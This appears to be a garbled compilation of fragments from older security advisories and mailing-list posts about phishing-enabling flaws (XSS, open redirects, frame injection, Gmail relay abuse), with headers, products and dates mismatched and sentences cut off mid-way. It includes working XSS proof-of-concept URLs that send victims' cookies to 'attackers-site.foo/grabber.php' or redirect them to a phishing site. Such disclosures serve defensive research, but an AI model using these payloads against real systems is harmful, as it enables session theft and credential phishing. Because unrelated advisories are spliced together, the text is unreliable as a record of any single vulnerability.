phishing
Version: 7.5.0
Hardware: Tomcat/Oracle
Vulnerability: Cross-Site Scripting, Phishing Through Frames,
Application Error
Overview:
next time you use Safari Top Sites, it will have the attacker's defined
sites replace your existing legitimate sites. To decide which sites to
replace, an attacker can first use the CSS History Hack found by Jeremiah
Grossman[2] and then set fake sites corresponding to the websites the user
has visited. Hence, this could easily facilitate a serious phishing attack.
The situation is worsened by Safari's inadequate protection against URL
obfuscation attacks as highlighted in [3], which makes it almost impossible
for a regular user to spot the fake site and differentiate it from a
legitimate one.
V. PROOF OF CONCEPT
This may be a little off-topic, but hopefully still of interest to this
audience.
Last Friday I had the opportunity to moderate a panel - Political
Phishing - A Threat to the 2008 Campaign? - held as part of the
Anti-Phishing Working Group eCrime Researchers Summit hosted by Carnegie
Mellon CyLab in Pittsburgh, PA. Our panelists were Rachna Dhamija from
Harvard University, Chris Soghoian from Indiana University, and Pat
Clarke of Jackson/Clark Partners. We had some great discussion on the
potential impact of Internet-borne threats to the upcoming US
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Onapsis Security Advisory 2010-004: SAP J2EE Authentication Phishing Vector
This advisory can be downloaded from http://www.onapsis.com/research.html.
By downloading this advisory from the Onapsis Resource Center, you will
gain access to beforehand information on upcoming advisories, presentations
and new research projects from the Onapsis Research Labs.
Application: Claroline eLearning and eWorking platform
Versions Affected: 1.8.9
Vendor URL: http://www.claroline.net/
Bug: Multiple XSS, Phishing Through URL Redirection, Change User Password XSRF Vulnerability
Exploits: YES
Reported: 04.07.2008
Vendor Response: 07.07.2008
Solution: YES
Date of Public Advisory: 18.07.2008
Authentication Agent was mentioned to be vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS as a
GET request (as opposed to POST). Therefore, the vulnerability can be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this
issue is different from CAN-2003-0389 and CVE-2005-3329.
Simple XSS Proof of Concept (PoC) URLs:
Application: XOOPS
Versions Affected: XOOPS 2.0.18
Vendor URL: http://www.xoops.org/
Bugs: Local File Include, URL Redirecting phishing
Exploits: YES
Reported: 28.01.2008
Vendor response: 28.01.2008
Date of Public Advisory: 04.02.2008
Authors: Alexandr Polyakov, Stas Svistunovich
https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie</script>
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--
The following requests allow password theft by redirecting to a
third-party 'spoof' site which would perform a phishing attack on the
victim:
https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://phishers-site.foo"</script>
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://phishers-site.foo%3C/script%3E%3C!--
attacker could send requests to other applications, authenticated as the
user. (CVE-2009-3983)
Jonathan Morgan discovered that Firefox did not properly display SSL
indicators under certain circumstances. This could be used by an attacker
to spoof an encrypted page, such as in a phishing attack. (CVE-2009-3984)
Jordi Chancel discovered that Firefox did not properly display invalid URLs
for a blank page. If a user were tricked into accessing a malicious
website, an attacker could exploit this to spoof the location bar, such as
in a phishing attack. (CVE-2009-3985)
By modifying the contents of intercepted secure e-mail messages or by
forging a close copy of the e-mail message, it may be possible for an
attacker to convince a user to view a modified secure e-mail message
and then cause the exposure of the user's credentials and message
content. Please see the Workarounds section for more information on
mitigations available to reduce exposure to these phishing-style
attacks. This vulnerability is documented in IronPort bug 8149 and
has been assigned Common Vulnerabilities and Exposures (CVE)
identifier CVE-2009-0054.
IronPort Encryption Appliance Administration Interface Vulnerabilities
Type: Cross Site Scripting (XSS)
Remote: Yes
Credit: Yaniv Miron aka "Lament"
Exploit:
http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=Phishing Error Message<script>alert('Malicious XSS Code')</script>
Yaniv Miron aka "Lament".
lament@ilhack.org
==========================================================================================
------------------------------------------------
Multiple Vulnerabilities in EASY Enterprise DMS
- Stored XSS
- XSS
- Content Injection / Phishing through Frames
- Unauthorized access to files
- Unauthorized manipulation of data
Date: 25.03.2010
------------------------------------------------
> Date: Tue, 10 Apr 2007 15:40:13 +0200
>
> Hello,
>
> I found a weakness in Microsoft Outlook Web Access (OWA), which
> potentially can be exploited by malicious people to conduct phishing
> attacks.
> The weakness is caused due to a design error in the way OWA uses an
> unverified user supplied argument to redirect a user after successful
> authentication.
> This can e.g. be exploited by tricking a user into following a link from
Vulnerability Report:
As part of our recent work on the trust hierarchy that exists among email providers throughout the Internet, we have uncovered a serious security flaw in Google's free email service, Gmail. This vulnerability exposes Google's email servers in a way that allows an attacker to use them as open spam and phishing relays. This issue is related to the risk of a malicious user abusing Gmail's email forwarding functionality. This is possible because Gmail's email forwarding functionality does not impose proper security restrictions during its setup process and can be easily subverted. By exploiting this problem an attacker can send unlimited spam and phishing (i.e. forged) email messages that are delivered by Google's very own SMTP servers. Since the messages are delivered by Google's own servers, an attack based on this flaw is able to bypass all spam filters that are based on the blacklist / whitelist concept. We were able to confirm that this vulnerability is indeed exploitable by crafting a proof of concept attack that allowed us to send any number of forged email messages without restriction through Google's server infrastructure. We have also verified that this flaw allows attackers to bypass spam filters by using our method to send messages that are usually flagged as spam. While sending these messages directly from our network in the traditional way had the messages classified as spam, by sending the very same messages using our exploit, the messages were delivered directly to the victim's inbox, thus bypassing filters.
Impact:
All email providers that offer Google's SMTP servers any special level of trust (e.g. whitelist status) are vulnerable.
On Wed, 7 May 2008 pablo.ximenes@upr.edu wrote:
A remote URI redirection vulnerability affects the RSA Authentication
Agent. This issue is due to a failure of the application to properly
sanitize URI-supplied data assigned to the 'url' parameter.
An attacker may leverage this issue to carry out convincing phishing
attacks against unsuspecting users by causing an arbitrary page to be
loaded once a RSA Authentication Agent specially-crafted URL is visited.
Although the 'url' parameter is filtered for protocol URLs such as
'http://' and 'https://', it is NOT filtered for other protocols such as
Manager. This type of attack can result in non-persistent defacement of
the target site, or the redirection of confidential information to
unauthorised third parties.
- An attacker may inject frames that embed third-party sites, which can
help launching phishing attacks by injecting a frame that points to a
"spoof" login page. Non-persistent defacement of the target site is also
possible.
- An attacker can redirect victim users to third-party sites after a
successful logon. Such behaviour can help attackers perform phishing
The following are some attack scenarios in which this vulnerability
could be used:
- annoyance or prank purposes
- advanced phishing attacks in which the victim gets a phone call
from "Trusted Bank" after clicking on a link included in the phishing
email. The fact that the attacker calls the victim's phone number
would help him/her gain the victim's trust. HINT: Phishers usually
don't know your phone number!
- toll fraud attacks in which the victim calls one of those very